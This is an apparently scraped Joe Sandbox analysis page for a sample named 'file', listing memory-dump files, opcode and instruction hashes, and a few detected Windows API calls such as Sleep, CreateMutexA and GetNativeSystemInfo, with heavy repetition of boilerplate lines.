Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: 793cea79a9713a81e6477173f11215025fc8f264b273fad397a59949ba4a8a1d
Instruction ID: 9a2003daf9d8e2375bc98e41740c6577431db2165d82ff045bea0f293afc5b6e
Opcode Fuzzy Hash: 793cea79a9713a81e6477173f11215025fc8f264b273fad397a59949ba4a8a1d
Instruction Fuzzy Hash: 323129B1B142049BEB18ABB8DC89BEDB7B3DB86310F248228E014D73D5DB7949C08756

Function 006B9ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: ffa329cb9f50ceaf903749e016d8f2e1de82ff0d58ec6553e9f4906703c4cef4
Instruction ID: 245c0d2d4d36b320a10481ec33b8b528b3abc0b53c4abd9ed4336fc2e0aa3a6e
Opcode Fuzzy Hash: ffa329cb9f50ceaf903749e016d8f2e1de82ff0d58ec6553e9f4906703c4cef4
Instruction Fuzzy Hash: 582137B1B142009BEB18AB6CDC89BEDB763EBC2310F20422DE514D77E1D77949C18B16

Function 006BA856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: c83018d6e1ceb3fe9fbf2b1c05abf1276fa346448ad09cf3fa095b757d1088a8
Instruction ID: dfef816e2a77a133a034edcce37edf2471656ca1fbce2837f9f0b361fd290bc7
Opcode Fuzzy Hash: c83018d6e1ceb3fe9fbf2b1c05abf1276fa346448ad09cf3fa095b757d1088a8
Instruction Fuzzy Hash: 712128F17652019AEB3867A8C89ABFDB253DF81300F24491AE448D67D1CA7A49C18397

Function 006BA34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 006BA963
CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981

Strings

T2q, xrefs: 006BA970

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2q
API String ID: 1464230837-1585859237
Opcode ID: 16a9a83eb35a6e0ed429b594214db48deb1c4c49208f27f5379901c35752aec5
Instruction ID: 2e5385d7070e13a05488554d1c5592a1670faf156c138e2d75ca834e3d423b2e
Opcode Fuzzy Hash: 16a9a83eb35a6e0ed429b594214db48deb1c4c49208f27f5379901c35752aec5
Instruction Fuzzy Hash: 2D2137B1B542009BEB2CABACDC89BEDB7A3EB92310F24422DE418D77D0D77955C08752

Function 006B7D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006B7ED3

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
